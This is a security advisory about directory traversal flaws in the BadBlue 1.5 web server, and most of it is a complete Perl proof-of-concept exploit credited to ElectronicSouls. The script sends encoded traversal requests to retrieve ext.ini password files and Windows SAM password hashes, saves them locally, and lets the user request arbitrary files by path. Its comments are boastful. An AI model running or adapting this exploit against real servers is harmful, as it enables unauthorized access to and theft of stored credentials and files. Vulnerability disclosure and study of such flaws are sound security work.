|
|
|
|
| |
BadBlue is the technology behind Working Resources Inc.'s product line with the same name and which, amongst other things, also powers Deerfield.com's D2Gfx file sharing community. The BadBlue technology suffers from multiple vulnerabilities which could be abused to obtain read access to any file and to execute system commands on the target host. In addition, this attack allows attackers to launch a resource exhaustion attack against the server.
The following is a proof of concept exploit code. |
| |
Credit:
The information has been provided by ElectronicSouls.
|
| |
Exploit:
#!/usr/bin/perl
#
#
# Remote Exploit For BadBlue 1.5 Web Server
# www.badblue.com
#
# A transversal bug has been discovered in
# BadBlue HTTP Daemon SoftWare. This is a
# gay bug, yes I know. But it can be kinda
# funny for those days you are bored =)
#
# Vulnerable System: Windows 95
# Windows 98
# Windows ME
# Windows NT 3.5
# Windows NT 4.0
# Windows 2000
# Windows XP
#
# syntax:
#
# -h --- Specify Host Name
# -p --- Specify Host Port
# -o --- For Grabbing Anothern file
# -l --- For Logging.
# -O --- Specify What OS
# 9x --- For Windows 95/98/mE (Gets the ext.ini with passwords)
# NT --- For Windows NT 3/4 (Gets sam file and ext.ini)
# 2K --- For Windows 2K SP-012 (Gets sam file and ext.ini)
# XP --- For Windows XP ALL
#
# perl badxploit.pl -h www.host.com -p 80 -l esh0yday.log -O 9x - For Win/9x
# perl badxploit.pl -h www.host.com -p 80 -l esh0yday.log -O NT - For Win/NT
# perl badxploit.pl -h www.host.com -p 80 -l esh0yday.log -o 2X - For Win/2K/XP
#
# *************************************************************************
# ** For the '-o' syntax you need to know the exact location of the file **
# ** NOTE! You can only get files from the same drive as BadBlue **
# ** **
# ** Eg if($badblue-drive == $c:) {syntax will be get a file C:\boot.ini **
# ** perl badxploit.pl -h www.host.com -p 80 -l es.log -o boot.ini } **
# ** Now check es.log for the contents of boot.ini =) **
# *************************************************************************
#
# You'll figure it out, If you don't understand.
#
# Greets: Websk8ter, BrainStorm, asmodian, _0x90_, divine, FreQ, northern, CraiK
# kokshin, rocky, omnis, NtWaK0, loophole, icesk, tsilik, crazyl0rd, [t]hief
# CraigTM, DeadMouse, irrupt, izik, sagi, ofer, natrix, samko, blah everyone else
# [!ElectronicSouls], HHP
#
# Special THNX AND GREET TO *** Pneuma *** for being there for me =) Luv ya!@
#
# Bug discovered and written by Iceburg of [!ElectronicSouls].
# Seelan@comstat.co.za
use Socket;
use Getopt::Std;
getopts("O:o:h:p:l:", \%args);
print ("\n");
print ("==================================================\n");
print ("== -- Remote Exploit For BadBlue 1.5 WebServers ==\n");
print ("== -- Discovered and Written By Iceburg ==\n");
print ("== -- [ElectronicSouls] Production. ==\n");
print ("==================================================\n");
print ("\n");
if (!defined $args{h}) {
print qq~
syntax:
-h --- Specify Host Name
-p --- Specify Host Port
-o --- For Grabbing Anothern file
-l --- For Logging.
-O --- Specify What OS
--9x --- For Windows 95/98/mE (Gets the ext.ini with passwords)
--NT --- For Windows NT 3/4 (Gets sam file and ext.ini)
--2K --- For Windows 2K SP-012 (Gets sam file and ext.ini)
--XP --- For Windows XP ALL
Syntax are case sensitive =)
~; exit; }
if (defined $args{h}) { $host=$args{h}; print "*** Exploiting $host ...\n"; }
if (defined $args{p}) { $port = $args{p} } else { $port = "80"; }
if (defined $args{l}) {
$file=$args{l};
$log=1;
open (LOG,">$file") || die ("*** Cannot open file for logging\n");
print LOG ("*** [ElectronicSouls] Production\n");
print LOG ("*** BadBlue 1.5 Remote Exploit\n");
print LOG ("*** Discovered And Written By Iceburg\n\n"); }
# This is like eleet unicode.
# I know more but I am too lazy to type it out.
# If these don't work try adding some more ..%2F||252f||255c..
# These are for default directories, if the directory ain't default
# it won't work, therefor you can use '-o' syntax.
# Win9x/mE Strings && WinNT/2K/XP
@sploits1 = (
"[ElectronicSouls]/..%2f../ext.ini", # Main String
"[0WNZ]/..%252f..%252f../ext.ini", # Alternative
"[YOU]/..%255c..%255c../ext.ini", ); # Alternative
# WinNT Strings
@sploits2 = (
"..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._",
"..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._",
"..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._",);
# Win2K Strings
@sploits3 = (
"..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam",
"..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam",
"..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam",);
# WinXP String
@sploits4 = (
"..%2F..%2F..%2F..%2F..%2F../windows/repair/sam",
"..%252f..%252f..%252f..%252f..%252f../windows/repair/sam",
"..%255c..%255c..%255c..%255c..%255c../windows/repair/sam",);
if (defined $args{o}) {
$string = $args{o};
print ("*** Using Manual String $string\n");
&connect;
send(SOCK,"GET /$string HTTP/1.0\r\n\r\n",0);
@ocheck=<SOCK>;
($http,$code,$blah) = split(/ /,$ocheck[0]);
if($code == 200) {
print ("=========================\n");
print ("*** Server is vulnerable \n");
print ("=========================\n");
print ("\n @ocheck\n");
print ("=========================\n");
if ($log) { print LOG ("==========================\n"); }
if ($log) { print LOG ("*** Server is vulnerable \n"); }
if ($log) { print LOG ("==========================\n"); }
if ($log) { print LOG ("@ocheck\n"); }
if ($log) { print LOG ("==========================\n"); }
die ("*** J00 15 kr4d+LUC|<Y+hax0r n0w\n\n"); } else { print ("*** SORRY J00 kr4|) H4x0r 7r1x0r d1|) n07 w3r|<\n\n"); }
}
if (defined $args{O}) {
if ($args{O} =~ "XP") { print ("*** Probing WinXP - ALL\n\n"); test4(); }
if ($args{O} =~ "2K") { print ("*** Probing Win2K - SP1-2\n\n"); test3(); }
if ($args{O} =~ "NT") { print ("*** Probing WinNT - 3/4\n\n"); test2(); }
if ($args{O} =~ "9x") { print ("*** Probing Win9x - ME\n\n"); test1(); }
}
sub test4 {
foreach $xploit4 (@sploits4) {
&connect;
send(SOCK,"GET /$xploit4 HTTP/1.0\r\n\r\n",0);
@check4=<SOCK>;
($http,$code,$blah) = split(/ /,$check4[0]);
if($code == 200) {
print ("=========================\n");
print ("*** Server is vulnerable \n");
print ("*** Getting sam file \n");
print ("=========================\n");
print ("\n");
open(SAM,">sam") || error();
my $x;
for ($x=8;$x<=30;$x++) {
print SAM ("$check4[$x]"); }
test1();
} else { print ("*** Server is not vulberable to string $xploit4\n"); }
close(SOCK); }
}
sub test3 {
foreach $xploit3 (@sploits3) {
&connect;
send(SOCK,"GET /$xploit3 HTTP/1.0\r\n\r\n",0);
@check3=<SOCK>;
($http,$code,$blah) = split(/ /,$check3[0]);
if($code == 200) {
print ("=========================\n");
print ("*** Server is vulnerable \n");
print ("*** Getting sam file \n");
print ("=========================\n");
print ("\n");
open(SAM,">sam") || error();
my $x;
for ($x=8;$x<=30;$x++) {
print SAM ("$check3[$x]"); }
test1();
} else { print ("*** Server is not vulberable to string $xploit3\n"); }
close(SOCK); }
}
sub test2 {
foreach $xploit2 (@sploits2) {
&connect;
send(SOCK,"GET /$xploit2 HTTP/1.0\r\n\r\n",0);
@check2=<SOCK>;
($http,$code,$blah) = split(/ /,$check2[0]);
if($code == 200) {
print ("=========================\n");
print ("*** Server is vulnerable \n");
print ("*** Getting sam file \n");
print ("=========================\n");
print ("\n");
open(SAM,">sam") || error();
my $x;
for ($x=8;$x<=30;$x++) {
print SAM ("$check2[$x]\n");
}
test1();
} else { print ("*** Server is not vulberable to string $xploit2\n"); }
close(SOCK); }
}
sub test1 {
foreach $xploit1 (@sploits1) {
&connect;
send(SOCK,"GET /$xploit1 HTTP/1.0\r\n\r\n",0);
@check=<SOCK>;
#print "@check";
($http,$code,$blah) = split(/ /,$check[0]);
if($code == 200) {
print ("===============================\n");
print ("*** Getting contents of ext.ini\n");
print ("*** Server is vulnerable \n");
print ("===============================\n");
print ("\n @check\n");
print ("===============================\n");
if ($log) { print LOG ("==========================\n"); }
if ($log) { print LOG ("*** Server is vulnerable \n"); }
if ($log) { print LOG ("*** Contents of ext.ini \n"); }
if ($log) { print LOG ("==========================\n"); }
for ($i=8;$i<=@check;$i++) { if ($log) { print LOG ("$check[$i]"); } }
if ($log) { print LOG ("==========================\n"); }
die ("*** J00 15 kr4d-hax0r n0w\n");
} else { print ("*** Server is not vulberable to string $xploit1\n"); }
close(SOCK); }
}
sub connect {
my($iaddr,$paddr,$proto);
$iaddr = inet_aton($host) || die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) || die "Error: $!";
$proto = getprotobyname('tcp') || die "Error: $!";
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die("Failed to open socket: $!");
connect(SOCK, $paddr) || die("Unable to connect: $!");
}
sub error {
print ("For some weird reason a error has occured: $!\n");
print ("Continueing ...\n");
}
|
|
|
|
|
|
|
